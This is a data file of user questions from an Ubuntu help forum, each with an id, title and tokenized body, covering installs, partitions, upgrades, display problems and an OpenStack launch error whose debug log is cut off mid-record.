481064	install vlc on offline ubuntu	i have 32 bit ubuntu 12.04 on an offline computer . i can access the internet using a different windows 7 computer and i have a memory key . how do i install vlc on my offline ubuntu computer ?
481065	accidentally deleted windows partition when trying to install ubuntu	i decided to install ubuntu 14.04 alongside windows7 just to check them however i seem to totally mess it up . i used wubi and wanted to install it on my d drive however i was confused during fixing the partition and went back to the installation program and chose to be installed along side windows thinking it would be installed on c : after installing everything seemed ok but windows did not recognize d drive ( i checked the device manager and was shown there partitioned without letter d ) i checked on ubuntu and only the 30gb partition was accessible on the same disk however the rest was gone ( the d drive 1t and had all my archive there photos videos etc ) i am almost sure that i did not formated the disk , only accidently ( ? ) partitioned it for ubuntu . can you please help to recover this mess ?
481066	display problems	i am running ubuntu 12.04 lts ( guest ) in vmware ws 7.1.2 on windows 7 64-bit host . i have vmware tools installed properly and have been using them for years . i have unchecked 3d acceleration -- never have used this . i am running mate but the problem persists when i change ( to and from ) xfce , gnome , mate a -- and back again i have been using this for a couple of years without any graphics issues . after an ubuntu update ( typical ) -- my video is corrupt and will not refresh correctly . as you may be able to tell from the image attached -- my desktop icons are `` mirrored '' and when i open a terminal window ( for instance ) -- sometimes -- the window appears multiple times . of course , only one is the real image -- it seems to be a refresh problem . i do not have enough reputation points to post an image . geez what a load of @ # % # $ $ % . does anyone know how to fix this ?
481067	setting read/write/execute permissions in linux	i just created a group and i am looking to add rwx to root and the group . what command ( s ) can i use to set the permission to ? also i would like world to have no permissions
481074	liveusb will not boot on lenovo v570	i have a lenovo v570 that i 'm trying to do a clean install of trusty on and for the life of me i ca n't find any way to get it working . when i try to boot from the sd card it 's on , it does n't even list it in the boot menu . i installed it from 'startup disk creator ' from another device with trusty but still no luck . i 've heard that there are a lot of problems with uefi , which i 'm guessing is the issue here but when i go into the bios , it mentions nothing about uefi . i 've tried different usb sticks , sd cards , dvds , and cds but still no luck . does anyone know how to fix this ?
481075	am i suppose to have a small or hidden partition hd ?	i am pretty new to ubuntu and linux in general . so , here is my question , when i upgraded my ubuntu 12 to 13.04 and 13.10 . i have to make an adjustment on my hard drive before installing os . after installing , i notices a 33 gb volume hd . what is the purpose of it ? thank you all and hope some feedbacks .
481076	can not upgrade from ubuntu 13.04 to 13.10	i know it seems like a duplicate question , but i in fact could n't find any topics , where people have the exact problem as me . i am desperately trying to upgrade my ubuntu , but many searches and trials have n't helped yet . so , i really hope you guys can help me upgrade my old ubuntu : ) i will just describe , what i tried so far . first of all : lsb_release -a lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch : cxx-3.0-amd64 : cxx-3.0-noarch : cxx-3.1-amd64 : cxx-3.1-noarch : cxx-3.2-amd64 : cxx-3.2-noarch : cxx-4.0-amd64 : cxx-4.0-noarch : desktop-3.1-amd64 : desktop-3.1-noarch : desktop-3.2-amd64 : desktop-3.2-noarch : desktop-4.0-amd64 : desktop-4.0-noarch : graphics-2.0-amd64 : graphics-2.0-noarch : graphics-3.0-amd64 : graphics-3.0-noarch : graphics-3.1-amd64 : graphics-3.1-noarch : graphics-3.2-amd64 : graphics-3.2-noarch : graphics-4.0-amd64 : graphics-4.0-noarch : printing-3.2-amd64 : printing-3.2-noarch : printing-4.0-amd64 : printing-4.0-noarch : qt4-3.1-amd64 : qt4-3.1-noarch distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring then i followed the steps from the instructions from ubuntuusers : sudo apt-get update hit http : //de2.archive.ubuntu.com raring release.gpg hit http : //de2.archive.ubuntu.com raring-updates release.gpg hit http : //de2.archive.ubuntu.com raring-backports release.gpg hit http : //de2.archive.ubuntu.com raring-security release.gpg hit http : //de2.archive.ubuntu.com raring release hit http : //de2.archive.ubuntu.com raring-updates release hit http : //de2.archive.ubuntu.com raring-backports release hit http : //de2.archive.ubuntu.com raring-security release hit http : //de2.archive.ubuntu.com raring/main sources hit http : //de2.archive.ubuntu.com raring/restricted sources hit http : //de2.archive.ubuntu.com raring/universe sources hit http : //de2.archive.ubuntu.com raring/multiverse sources hit http : //de2.archive.ubuntu.com raring/main amd64 packages hit http : //de2.archive.ubuntu.com raring/restricted amd64 packages hit http : //de2.archive.ubuntu.com raring/universe amd64 packages hit http : //de2.archive.ubuntu.com raring/multiverse amd64 packages hit http : //de2.archive.ubuntu.com raring/main i386 packages hit http : //de2.archive.ubuntu.com raring/restricted i386 packages hit http : //de2.archive.ubuntu.com raring/universe i386 packages hit http : //de2.archive.ubuntu.com raring/multiverse i386 packages hit http : //de2.archive.ubuntu.com raring/main translation-en hit http : //de2.archive.ubuntu.com raring/main translation-en_gb hit http : //de2.archive.ubuntu.com raring/main translation-de hit http : //de2.archive.ubuntu.com raring/main translation-ru hit http : //de2.archive.ubuntu.com raring/multiverse translation-en hit http : //de2.archive.ubuntu.com raring/multiverse translation-en_gb hit http : //de2.archive.ubuntu.com raring/multiverse translation-de hit http : //de2.archive.ubuntu.com raring/multiverse translation-ru hit http : //de2.archive.ubuntu.com raring/restricted translation-en hit http : //de2.archive.ubuntu.com raring/restricted translation-en_gb hit http : //de2.archive.ubuntu.com raring/restricted translation-de hit http : //de2.archive.ubuntu.com raring/restricted translation-ru hit http : //de2.archive.ubuntu.com raring/universe translation-en hit http : //de2.archive.ubuntu.com raring/universe translation-en_gb hit http : //de2.archive.ubuntu.com raring/universe translation-de hit http : //de2.archive.ubuntu.com raring/universe translation-ru hit http : //de2.archive.ubuntu.com raring-updates/main sources hit http : //de2.archive.ubuntu.com raring-updates/restricted sources hit http : //de2.archive.ubuntu.com raring-updates/universe sources hit http : //de2.archive.ubuntu.com raring-updates/multiverse sources hit http : //de2.archive.ubuntu.com raring-updates/main amd64 packages hit http : //de2.archive.ubuntu.com raring-updates/restricted amd64 packages hit http : //de2.archive.ubuntu.com raring-updates/universe amd64 packages hit http : //de2.archive.ubuntu.com raring-updates/multiverse amd64 packages hit http : //de2.archive.ubuntu.com raring-updates/main i386 packages hit http : //de2.archive.ubuntu.com raring-updates/restricted i386 packages hit http : //de2.archive.ubuntu.com raring-updates/universe i386 packages hit http : //de2.archive.ubuntu.com raring-updates/multiverse i386 packages hit http : //de2.archive.ubuntu.com raring-updates/main translation-en hit http : //de2.archive.ubuntu.com raring-updates/multiverse translation-en hit http : //de2.archive.ubuntu.com raring-updates/restricted translation-en hit http : //de2.archive.ubuntu.com raring-updates/universe translation-en hit http : //de2.archive.ubuntu.com raring-backports/main sources hit http : //de2.archive.ubuntu.com raring-backports/restricted sources hit http : //de2.archive.ubuntu.com raring-backports/universe sources hit http : //de2.archive.ubuntu.com raring-backports/multiverse sources hit http : //de2.archive.ubuntu.com raring-backports/main amd64 packages hit http : //de2.archive.ubuntu.com raring-backports/restricted amd64 packages hit http : //de2.archive.ubuntu.com raring-backports/universe amd64 packages hit http : //de2.archive.ubuntu.com raring-backports/multiverse amd64 packages hit http : //de2.archive.ubuntu.com raring-backports/main i386 packages hit http : //de2.archive.ubuntu.com raring-backports/restricted i386 packages hit http : //de2.archive.ubuntu.com raring-backports/universe i386 packages hit http : //de2.archive.ubuntu.com raring-backports/multiverse i386 packages hit http : //de2.archive.ubuntu.com raring-backports/main translation-en hit http : //de2.archive.ubuntu.com raring-backports/multiverse translation-en hit http : //de2.archive.ubuntu.com raring-backports/restricted translation-en hit http : //de2.archive.ubuntu.com raring-backports/universe translation-en hit http : //de2.archive.ubuntu.com raring-security/main sources hit http : //de2.archive.ubuntu.com raring-security/restricted sources hit http : //de2.archive.ubuntu.com raring-security/universe sources hit http : //de2.archive.ubuntu.com raring-security/multiverse sources hit http : //de2.archive.ubuntu.com raring-security/main amd64 packages hit http : //de2.archive.ubuntu.com raring-security/restricted amd64 packages hit http : //de2.archive.ubuntu.com raring-security/universe amd64 packages hit http : //de2.archive.ubuntu.com raring-security/multiverse amd64 packages hit http : //de2.archive.ubuntu.com raring-security/main i386 packages hit http : //de2.archive.ubuntu.com raring-security/restricted i386 packages hit http : //de2.archive.ubuntu.com raring-security/universe i386 packages hit http : //de2.archive.ubuntu.com raring-security/multiverse i386 packages hit http : //de2.archive.ubuntu.com raring-security/main translation-en hit http : //de2.archive.ubuntu.com raring-security/multiverse translation-en hit http : //de2.archive.ubuntu.com raring-security/restricted translation-en hit http : //de2.archive.ubuntu.com raring-security/universe translation-en ign http : //de2.archive.ubuntu.com raring/main translation-en_us ign http : //de2.archive.ubuntu.com raring/multiverse translation-en_us ign http : //de2.archive.ubuntu.com raring/restricted translation-en_us ign http : //de2.archive.ubuntu.com raring/universe translation-en_us ign http : //de2.archive.ubuntu.com raring-updates/main translation-en_us ign http : //de2.archive.ubuntu.com raring-updates/main translation-en_gb ign http : //de2.archive.ubuntu.com raring-updates/main translation-de ign http : //de2.archive.ubuntu.com raring-updates/main translation-ru ign http : //de2.archive.ubuntu.com raring-updates/multiverse translation-en_us ign http : //de2.archive.ubuntu.com raring-updates/multiverse translation-en_gb ign http : //de2.archive.ubuntu.com raring-updates/multiverse translation-de ign http : //de2.archive.ubuntu.com raring-updates/multiverse translation-ru ign http : //de2.archive.ubuntu.com raring-updates/restricted translation-en_us ign http : //de2.archive.ubuntu.com raring-updates/restricted translation-en_gb ign http : //de2.archive.ubuntu.com raring-updates/restricted translation-de ign http : //de2.archive.ubuntu.com raring-updates/restricted translation-ru ign http : //de2.archive.ubuntu.com raring-updates/universe translation-en_us ign http : //de2.archive.ubuntu.com raring-updates/universe translation-en_gb ign http : //de2.archive.ubuntu.com raring-updates/universe translation-de ign http : //de2.archive.ubuntu.com raring-updates/universe translation-ru ign http : //de2.archive.ubuntu.com raring-backports/main translation-en_us ign http : //de2.archive.ubuntu.com raring-backports/main translation-en_gb ign http : //de2.archive.ubuntu.com raring-backports/main translation-de ign http : //de2.archive.ubuntu.com raring-backports/main translation-ru ign http : //de2.archive.ubuntu.com raring-backports/multiverse translation-en_us ign http : //de2.archive.ubuntu.com raring-backports/multiverse translation-en_gb ign http : //de2.archive.ubuntu.com raring-backports/multiverse translation-de ign http : //de2.archive.ubuntu.com raring-backports/multiverse translation-ru ign http : //de2.archive.ubuntu.com raring-backports/restricted translation-en_us ign http : //de2.archive.ubuntu.com raring-backports/restricted translation-en_gb ign http : //de2.archive.ubuntu.com raring-backports/restricted translation-de ign http : //de2.archive.ubuntu.com raring-backports/restricted translation-ru ign http : //de2.archive.ubuntu.com raring-backports/universe translation-en_us ign http : //de2.archive.ubuntu.com raring-backports/universe translation-en_gb ign http : //de2.archive.ubuntu.com raring-backports/universe translation-de ign http : //de2.archive.ubuntu.com raring-backports/universe translation-ru ign http : //de2.archive.ubuntu.com raring-security/main translation-en_us ign http : //de2.archive.ubuntu.com raring-security/main translation-en_gb ign http : //de2.archive.ubuntu.com raring-security/main translation-de ign http : //de2.archive.ubuntu.com raring-security/main translation-ru ign http : //de2.archive.ubuntu.com raring-security/multiverse translation-en_us ign http : //de2.archive.ubuntu.com raring-security/multiverse translation-en_gb ign http : //de2.archive.ubuntu.com raring-security/multiverse translation-de ign http : //de2.archive.ubuntu.com raring-security/multiverse translation-ru ign http : //de2.archive.ubuntu.com raring-security/restricted translation-en_us ign http : //de2.archive.ubuntu.com raring-security/restricted translation-en_gb ign http : //de2.archive.ubuntu.com raring-security/restricted translation-de ign http : //de2.archive.ubuntu.com raring-security/restricted translation-ru ign http : //de2.archive.ubuntu.com raring-security/universe translation-en_us ign http : //de2.archive.ubuntu.com raring-security/universe translation-en_gb ign http : //de2.archive.ubuntu.com raring-security/universe translation-de ign http : //de2.archive.ubuntu.com raring-security/universe translation-ru reading package lists ... done sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . update manager core is installed . sudo do-release-upgrade ( had to delete about 90 % of it , because site does n't allow so many characters ) hit http : //de2.archive.ubuntu.com raring/main translation-en_gb hit http : //de2.archive.ubuntu.com raring/main translation-de hit http : //de2.archive.ubuntu.com raring/main translation-ru err http : //de2.archive.ubuntu.com saucy-security/restricted translation-de err http : //de2.archive.ubuntu.com saucy-security/restricted translation-ru err http : //de2.archive.ubuntu.com saucy-security/universe translation-en_us err http : //de2.archive.ubuntu.com saucy-security/universe translation-en_gb err http : //de2.archive.ubuntu.com saucy-security/universe translation-de err http : //de2.archive.ubuntu.com saucy-security/universe translation-ru ign http : //de2.archive.ubuntu.com saucy/main translation-en_us ign http : //de2.archive.ubuntu.com saucy/multiverse translation-en_us ign http : //de2.archive.ubuntu.com saucy/restricted translation-en_us ign http : //de2.archive.ubuntu.com saucy/universe translation-en_us ign http : //de2.archive.ubuntu.com saucy-updates/main translation-en_us ign http : //de2.archive.ubuntu.com saucy-updates/multiverse translation-en_us ign http : //de2.archive.ubuntu.com saucy-updates/restricted translation-en_us ign http : //de2.archive.ubuntu.com saucy-updates/universe translation-en_us ign http : //de2.archive.ubuntu.com saucy-backports/main translation-en_us ign http : //de2.archive.ubuntu.com saucy-backports/main translation-en_gb ign http : //de2.archive.ubuntu.com saucy-backports/main translation-de ign http : //de2.archive.ubuntu.com saucy-backports/main translation-ru ign http : //de2.archive.ubuntu.com saucy-backports/multiverse translation-en_us ign http : //de2.archive.ubuntu.com saucy-backports/multiverse translation-en_gb ign http : //de2.archive.ubuntu.com saucy-backports/multiverse translation-de ign http : //de2.archive.ubuntu.com saucy-backports/multiverse translation-ru ign http : //de2.archive.ubuntu.com saucy-backports/restricted translation-en_us ign http : //de2.archive.ubuntu.com saucy-backports/restricted translation-en_gb ign http : //de2.archive.ubuntu.com saucy-backports/restricted translation-de ign http : //de2.archive.ubuntu.com saucy-backports/restricted translation-ru ign http : //de2.archive.ubuntu.com saucy-backports/universe translation-en_us ign http : //de2.archive.ubuntu.com saucy-backports/universe translation-en_gb ign http : //de2.archive.ubuntu.com saucy-backports/universe translation-de ign http : //de2.archive.ubuntu.com saucy-backports/universe translation-ru ign http : //de2.archive.ubuntu.com saucy-security/main translation-en_us ign http : //de2.archive.ubuntu.com saucy-security/main translation-en_gb ign http : //de2.archive.ubuntu.com saucy-security/main translation-de ign http : //de2.archive.ubuntu.com saucy-security/main translation-ru ign http : //de2.archive.ubuntu.com saucy-security/multiverse translation-en_us ign http : //de2.archive.ubuntu.com saucy-security/multiverse translation-en_gb ign http : //de2.archive.ubuntu.com saucy-security/multiverse translation-de ign http : //de2.archive.ubuntu.com saucy-security/multiverse translation-ru ign http : //de2.archive.ubuntu.com saucy-security/restricted translation-en_us ign http : //de2.archive.ubuntu.com saucy-security/restricted translation-en_gb ign http : //de2.archive.ubuntu.com saucy-security/restricted translation-de ign http : //de2.archive.ubuntu.com saucy-security/restricted translation-ru ign http : //de2.archive.ubuntu.com saucy-security/universe translation-en_us ign http : //de2.archive.ubuntu.com saucy-security/universe translation-en_gb ign http : //de2.archive.ubuntu.com saucy-security/universe translation-de ign http : //de2.archive.ubuntu.com saucy-security/universe translation-ru fetched 41.6 mb in 6s ( 0 b/s ) checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done i also tried updating through software center . the order of steps , and their effects : click on software center . software updater window appears . windows says `` checking for updates '' . windows says `` software updates are no longer provided for ubuntu 13.04 '' . i click on `` upgrade '' -button . i am asked to enter my password - do so . the windows just disappear and nothing happens . please let me know , if more info is needed , to solve the problem . thank you in advance !
481080	what would be a better environment for a linux based retail point of sales program ?	i 'm looking at standard ubuntu , lubuntu , or xubuntu . i was just wondering which would be a better environment for a retail store ? i will be using lemon pos to start with but i am considering building my own once i learn how to do that .
481086	can i access files between a ubuntu 14.04 guest and a mac host on virtualbox guest additions ?	i suspect it can not be done . the closest 'answer ' i found was virtualbox 4.3 guest additions on osx guest but i would like to go with ubuntu 14.04 guest on a imac host . i have not been successful in installing ubuntu on my mid-2011 12,1 imac os x 10.9.3 even after following several guides , but i can run 14.04 on that imac . i have virtualbox 4.3.12 with the extension pack installed and guest additions on the ubuntu 14.04 guest . fading hope . scott
481088	ca n't boot windows anymore ?	installed xubuntu , restart computer , and it instantly boots up into xubuntu , when usually i have the choice of booting into windows as well as an old installation of ubuntu i downloaded a long time ago . what do i do ? ! ? i apologize , i 'm a big newbie and was very naive for installing this without putting more thought and effort into this .
481089	how do i monitor the network health of an ubuntu server ?	we have a ubuntu box in the cloud and our cloud provider has networking issues sometimes which makes the box unable to communicate with the outside world . at times , it 's the dns server , at times , it 's connectivity issues with the data center . are there any services that 'll allow me to constantly monitor the network-ability of the box ?
481092	how to configure path or set environment variables for installation ?	i 'm aiming to install ape in ubuntu 14.04 lts , a simple code for pseudopotential generation . i 'm having this error message while running ./configure : checking for gsl-config ... no checking for gsl - version > = 1.0 ... no *** the gsl-config script installed by gsl could not be found *** if gsl was installed in prefix , make sure prefix/bin is in *** your path , or set the gsl_config environment variable to the *** full path to gsl-config . configure : error : could not find required gsl library i checked and i have the gsl already installed : : ~/programas/ape-2.2.0 $ dpkg -l | grep gsl ii libgsl0ldbl 1.16+dfsg-1ubuntu1 i386 gnu scientific library ( gsl ) -- library package so i have the library but the program installation is n't finding it . any help ? thanks in advance
481097	why has my internet speed dropped down ?	i recently switched to ubuntu . i 've been having a lot of internet troubles ever since . i used windows 7 before . i 've had trouble loading web pages , and it would take a solid minute or two to even start displaying anything . why is this ? how can i fix this ? details : ubuntu 14.04 here 's a comparison : speedtest on my phone : speedtest on my pc : taken about 30 seconds apart . edit : complete information on wifi .
481098	ubuntu 14.04 lts full hd problems	i will share here a question i have regarding the ubuntu instalation on full hd screens and i hope you guys can help me solving it so people with the same problem can find it here ! i have a full hp sony vaio fit 14 and i really disliked the windows 8.1 that came on it than i decided to install ubuntu ( i am already a ubuntu user for 3 years approx. ) . well , i will try to list the problem i am having here and the solutions i 've already tried : 1 ) everything looks way too small on the screen . i almost can not read what is in the screen . see picture http : //s21.postimg.org/5r85iuffq/small.jpgâ¨ / > click here if image doesnâ´t load here are the things i 've tried : changing the resolution from 1920 x 1080 for 1366 x 768 : it fits but everything looks distorted or blury . that 's not the idea when you have a full hd screen : p installing ubuntu tweak / unity tweak tool / tweak tool : i could change the size of the ubuntu titles and the system font sizes but the website 's fonts remains too small . sad . changing the scale of the font on system setting : the same result of the solutions above . i could change the system fonts . question : do anyone know how can i change the resolution or increase the font for everything without loosing resolution ? sorry if some typos , i almost can not read what i am writing .
481099	is there a mac emulator for ubuntu ?	i want to get a program to run mac programs on ubuntu 14.04 . there is wine for running windows programs but i could n't find a program to run mac programs .
481100	font showing up as squares during installation	i am new to linux , and i chose ubuntu as my first linux distro . i created a boot flash drive and installed it on my little netbook . it works fine , and i 'm having fun playing around with it . now i wanted to install it on my main computer , however after inserting the flash drive and rebooting , and after the initial startup screen , the first screen that comes up has all the text showing up as little squares ! if i remember correctly from when i installed it on the netbook , it 's asking me what language i want on this screen . why would this happen on my main computer and not on the little netbook , when i used the exact same flash drive and installation ? i have a screenshot , but since i 'm new here , it wo n't let me post it .
481103	creating swap partition	hello i am very new user of linux . i am going to install ubuntu 14.0.4 and have two questions : the partition in which the ubuntu will be installed , what would be the partition type primary or logical ? i also want to know that what would be the partition type of the swap area ? logical or primary ?
481104	mate not showing up after install	i just used synaptic to install mate desktop environment on my ubuntu 14.04 computer . it installed successfully , but after rebooting , it 's not showing up on the login screen . my only options are to choose from ubuntu ( default ) or xfce . does anyone know why and how do i get mate to work ?
481105	juju openstack bundle : ca n't launch an instance	deployed bundle : ~makyo/openstack/2/openstack , on top of 7 physical boxes and 3 virtual ones . after changing vip_iface strings to point to right devices , e.g. , br0 instead of eth0 , and defining `` /mnt/loopback|30g '' , in cinder 's block-device string , am able to navigate through openstack dashboard , error free . following http : //docs.openstack.org/grizzly/openstack-compute/install/apt/content/running-an-instance.html instructions , attempted to launch cirros 0.3.1 image ; however , novalist shows the instance in error state . ubuntu @ node7 : ~ $ nova -- debug boot -- flavor 1 -- image 28bed1bc-bc1c-4533-beee-8e0428ad40dd -- key_name key2 -- security_group default cirros req : curl -i http : //keystone.ip:5000/v2.0/tokens -x post -h `` content-type : application/json '' -h `` accept : application/json '' -h `` user-agent : python-novaclient '' -d ' { `` auth '' : { `` tenantname '' : `` admin '' , `` passwordcredentials '' : { `` username '' : `` admin '' , `` password '' : `` openstack '' } } } ' info ( connectionpool:191 ) starting new http connection ( 1 ) : keystone.ip debug ( connectionpool:283 ) `` post /v2.0/tokens http/1.1 '' 200 none resp : [ 200 ] { 'date ' : 'tue , 10 jun 2014 00:01:02 gmt ' , 'transfer-encoding ' : 'chunked ' , 'vary ' : 'x-auth-token ' , 'content-type ' : 'application/json ' } resp body : { `` access '' : { `` token '' : { `` expires '' : `` 2014-06-11t00:01:02z '' , `` id '' : `` 3eefa1837d984426a633fe09259a1534 '' , `` tenant '' : { `` description '' : `` created by juju '' , `` enabled '' : true , `` id '' : `` 08cff06d13b74492b780d9ceed699239 '' , `` name '' : `` admin '' } } , `` servicecatalog '' : [ { `` endpoints '' : [ { `` adminurl '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239 '' , `` region '' : `` regionone '' , `` internalurl '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239 '' , `` publicurl '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239 '' } ] , `` endpoints_links '' : [ ] , `` type '' : `` compute '' , `` name '' : `` nova '' } , { `` endpoints '' : [ { `` adminurl '' : `` http : //nova.cloud.controller:9696 '' , `` region '' : `` regionone '' , `` internalurl '' : `` http : //nova.cloud.controller:9696 '' , `` publicurl '' : `` http : //nova.cloud.controller:9696 '' } ] , `` endpoints_links '' : [ ] , `` type '' : `` network '' , `` name '' : `` quantum '' } , { `` endpoints '' : [ { `` adminurl '' : `` http : //nova.cloud.controller:3333 '' , `` region '' : `` regionone '' , `` internalurl '' : `` http : //nova.cloud.controller:3333 '' , `` publicurl '' : `` http : //nova.cloud.controller:3333 '' } ] , `` endpoints_links '' : [ ] , `` type '' : `` s3 '' , `` name '' : `` s3 '' } , { `` endpoints '' : [ { `` adminurl '' : `` http : //i.p.s.36:9292 '' , `` region '' : `` regionone '' , `` internalurl '' : `` http : //i.p.s.36:9292 '' , `` publicurl '' : `` http : //i.p.s.36:9292 '' } ] , `` endpoints_links '' : [ ] , `` type '' : `` image '' , `` name '' : `` glance '' } , { `` endpoints '' : [ { `` adminurl '' : `` http : //i.p.s.39:8776/v1/08cff06d13b74492b780d9ceed699239 '' , `` region '' : `` regionone '' , `` internalurl '' : `` http : //i.p.s.39:8776/v1/08cff06d13b74492b780d9ceed699239 '' , `` publicurl '' : `` http : //i.p.s.39:8776/v1/08cff06d13b74492b780d9ceed699239 '' } ] , `` endpoints_links '' : [ ] , `` type '' : `` volume '' , `` name '' : `` cinder '' } , { `` endpoints '' : [ { `` adminurl '' : `` http : //nova.cloud.controller:8773/services/cloud '' , `` region '' : `` regionone '' , `` internalurl '' : `` http : //nova.cloud.controller:8773/services/cloud '' , `` publicurl '' : `` http : //nova.cloud.controller:8773/services/cloud '' } ] , `` endpoints_links '' : [ ] , `` type '' : `` ec2 '' , `` name '' : `` ec2 '' } , { `` endpoints '' : [ { `` adminurl '' : `` http : //keystone.ip:35357/v2.0 '' , `` region '' : `` regionone '' , `` internalurl '' : `` http : //keystone.ip:5000/v2.0 '' , `` publicurl '' : `` http : //i.p.s.44:5000/v2.0 '' } ] , `` endpoints_links '' : [ ] , `` type '' : `` identity '' , `` name '' : `` keystone '' } ] , `` user '' : { `` username '' : `` admin '' , `` roles_links '' : [ ] , `` id '' : `` b3730a52a32e40f0a9500440d1ef1c7d '' , `` roles '' : [ { `` id '' : `` e020001eb9a049f4a16540238ab158aa '' , `` name '' : `` admin '' } , { `` id '' : `` b84fbff4d5554d53bbbffdaad66b56cb '' , `` name '' : `` keystoneserviceadmin '' } , { `` id '' : `` 129c8b49d42b4f0796109aaef2069aa9 '' , `` name '' : `` keystoneadmin '' } ] , `` name '' : `` admin '' } } } req : curl -i http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd -x get -h `` x-auth-project-id : admin '' -h `` user-agent : python-novaclient '' -h `` accept : application/json '' -h `` x-auth-token : 3eefa1837d984426a633fe09259a1534 '' info ( connectionpool:191 ) starting new http connection ( 1 ) : nova.cloud.controller debug ( connectionpool:283 ) `` get /v1.1/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd http/1.1 '' 200 719 resp : [ 200 ] { 'date ' : 'tue , 10 jun 2014 00:01:03 gmt ' , 'x-compute-request-id ' : 'req-7f3459f8-d3d5-47f1-97a3-8407a4419a69 ' , 'content-type ' : 'application/json ' , 'content-length ' : '719 ' } resp body : { `` image '' : { `` status '' : `` active '' , `` updated '' : `` 2014-06-09t22:17:54z '' , `` links '' : [ { `` href '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` rel '' : `` self '' } , { `` href '' : `` http : //nova.cloud.controller:8774/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` rel '' : `` bookmark '' } , { `` href '' : `` http : //external.public.port:9292/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` type '' : `` application/vnd.openstack.image '' , `` rel '' : `` alternate '' } ] , `` id '' : `` 28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` os-ext-img-size : size '' : 13147648 , `` name '' : `` cirros 0.3.1 '' , `` created '' : `` 2014-06-09t22:17:54z '' , `` mindisk '' : 0 , `` progress '' : 100 , `` minram '' : 0 , `` metadata '' : { } } } req : curl -i http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/flavors/1 -x get -h `` x-auth-project-id : admin '' -h `` user-agent : python-novaclient '' -h `` accept : application/json '' -h `` x-auth-token : 3eefa1837d984426a633fe09259a1534 '' info ( connectionpool:191 ) starting new http connection ( 1 ) : nova.cloud.controller debug ( connectionpool:283 ) `` get /v1.1/08cff06d13b74492b780d9ceed699239/flavors/1 http/1.1 '' 200 418 resp : [ 200 ] { 'date ' : 'tue , 10 jun 2014 00:01:04 gmt ' , 'x-compute-request-id ' : 'req-2c153110-6969-4f3a-b51c-8f1a6ce75bee ' , 'content-type ' : 'application/json ' , 'content-length ' : '418 ' } resp body : { `` flavor '' : { `` name '' : `` m1.tiny '' , `` links '' : [ { `` href '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/flavors/1 '' , `` rel '' : `` self '' } , { `` href '' : `` http : //nova.cloud.controller:8774/08cff06d13b74492b780d9ceed699239/flavors/1 '' , `` rel '' : `` bookmark '' } ] , `` ram '' : 512 , `` os-flv-disabled : disabled '' : false , `` vcpus '' : 1 , `` swap '' : `` '' , `` os-flavor-access : is_public '' : true , `` rxtx_factor '' : 1.0 , `` os-flv-ext-data : ephemeral '' : 0 , `` disk '' : 0 , `` id '' : `` 1 '' } } req : curl -i http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/servers -x post -h `` x-auth-project-id : admin '' -h `` user-agent : python-novaclient '' -h `` content-type : application/json '' -h `` accept : application/json '' -h `` x-auth-token : 3eefa1837d984426a633fe09259a1534 '' -d ' { `` server '' : { `` name '' : `` cirros '' , `` imageref '' : `` 28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` key_name '' : `` key2 '' , `` flavorref '' : `` 1 '' , `` max_count '' : 1 , `` min_count '' : 1 , `` security_groups '' : [ { `` name '' : `` default '' } ] } } ' info ( connectionpool:191 ) starting new http connection ( 1 ) : nova.cloud.controller debug ( connectionpool:283 ) `` post /v1.1/08cff06d13b74492b780d9ceed699239/servers http/1.1 '' 202 436 resp : [ 202 ] { 'date ' : 'tue , 10 jun 2014 00:01:05 gmt ' , 'x-compute-request-id ' : 'req-41e53086-6454-4efb-bb35-a30dc2c780be ' , 'content-type ' : 'application/json ' , 'location ' : 'http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/servers/2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ' , 'content-length ' : '436 ' } resp body : { `` server '' : { `` security_groups '' : [ { `` name '' : `` default '' } ] , `` os-dcf : diskconfig '' : `` manual '' , `` id '' : `` 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 '' , `` links '' : [ { `` href '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/servers/2eb5e3ad-3044-41c1-bbb7-10f398f83e43 '' , `` rel '' : `` self '' } , { `` href '' : `` http : //nova.cloud.controller:8774/08cff06d13b74492b780d9ceed699239/servers/2eb5e3ad-3044-41c1-bbb7-10f398f83e43 '' , `` rel '' : `` bookmark '' } ] , `` adminpass '' : `` ofrbvrqif2c8 '' } } req : curl -i http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/servers/2eb5e3ad-3044-41c1-bbb7-10f398f83e43 -x get -h `` x-auth-project-id : admin '' -h `` user-agent : python-novaclient '' -h `` accept : application/json '' -h `` x-auth-token : 3eefa1837d984426a633fe09259a1534 '' info ( connectionpool:191 ) starting new 